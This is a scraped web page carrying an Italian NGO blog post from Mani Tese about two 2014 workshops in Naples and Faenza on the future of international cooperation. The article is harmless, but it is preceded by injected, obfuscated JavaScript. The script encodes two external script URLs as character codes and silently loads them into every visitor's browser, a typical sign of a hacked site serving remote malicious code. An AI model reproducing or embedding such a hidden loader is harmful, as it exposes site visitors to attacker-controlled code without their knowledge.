var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Faenza e Napoli, "I Laboratori di idee sulla cooperazione internazionale" - Mani TeseMani Tese

← Torna a Laboratorio di idee

Faenza e Napoli, “I Laboratori di idee sulla cooperazione internazionale”

0

08 ottobre 2014

Uno sguardo sul futuro 

4K0A8671Durante le giornate del 20 e del 21 settembre si sono svolti, a Napoli e a Faenza, due “Laboratori di idee sulla cooperazione internazionale” con soci e volontari sui cambiamenti in atto nella cooperazione internazionale e sulle conseguenze che essi determinano nel modo di agire da parte della nostra Associazione.

4K0A8688L’incontro a Napoli si è svolto sabato 20 settembre nella Fiera dei Beni Comuni a cui partecipava anche Mani Tese, mentre a Faenza si è tenuto domenica 21 presso la Festa del Riuso di Mani Tese. All’incontro di Napoli hanno partecipato circa 15 persone, appartenenti al gruppo di Napoli, mentre a Faenza hanno partecipato circa 40 persone, appartenenti ai gruppi dell’Emilia Romagna, ma anche della Lombardia, del Veneto e della Toscana.

I lavori di gruppo sono stati svolti con l’aiuto di una tecnica di facilitazione, il Metaplan, che prevede di scrivere la propria opinione in merito al tema su alcuni foglietti di carta adesivi, attaccati, in seguito, su pareti, visibili a tutti e organizzati in blocchi logici. Tutte le idee scritte sui foglietti di carta vengono poi trascritte dal un rappresentante e rimangono a disposizione di coloro che desiderano rivedere quanto emerso.

Faenza intervento GiovanniDurante la prima attività è stato chiesto ai partecipanti di rispondere alla seguente domanda: “Come mi immagino Mani Tese tra 10 anni?”, immaginare di quali progetti Mani Tese si occuperà in futuro e le finalità a cui dovrà rispondere. A seguire, un momento di racconto da parte di Giovanni Sartor, coordinatore e gestore dei progetti di cooperazione internazionale di Mani Tese, in merito ai cambiamenti in atto nella cooperazione internazionale e al percorso di Mani Tese.

4K0A8697

“Quale cooperazione per MT?” è stata la seconda domanda sulla quale i partecipanti hanno dovuto riflettere, seguendo una suddivisione basata su tre argomenti specifici: tipologia progettuale, partenariati e finanziamenti. La terza ed ultima attività ha affrontato il tema del ruolo del volontario e dell’azione territoriale in questo quadro di cambiamenti.

 

Napoli

Sia a Napoli che a Faenza sono emersi molti spunti interessanti su cui stiamo lavorando per impostare il lavoro da svolgere nella pre-assemblea di Novembre, durante la quale cercheremo di identificare le tematiche specifiche su cui orientare le nostre politiche future che confluiranno nel prossimo Piano strategico triennale. Vi invitiamo a proseguire la riflessione su questo blog, scaricando e leggendo i report dei due incontri che trovate di seguito, commentando i risultati dei due Laboratori di idee e aggiungendo riflessioni sugli stessi argomenti.

 

Scarica il Report di Faenza

Scarica il Report di Napoli

 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

MANITESE OPERA IN 11 PAESI DEL MONDO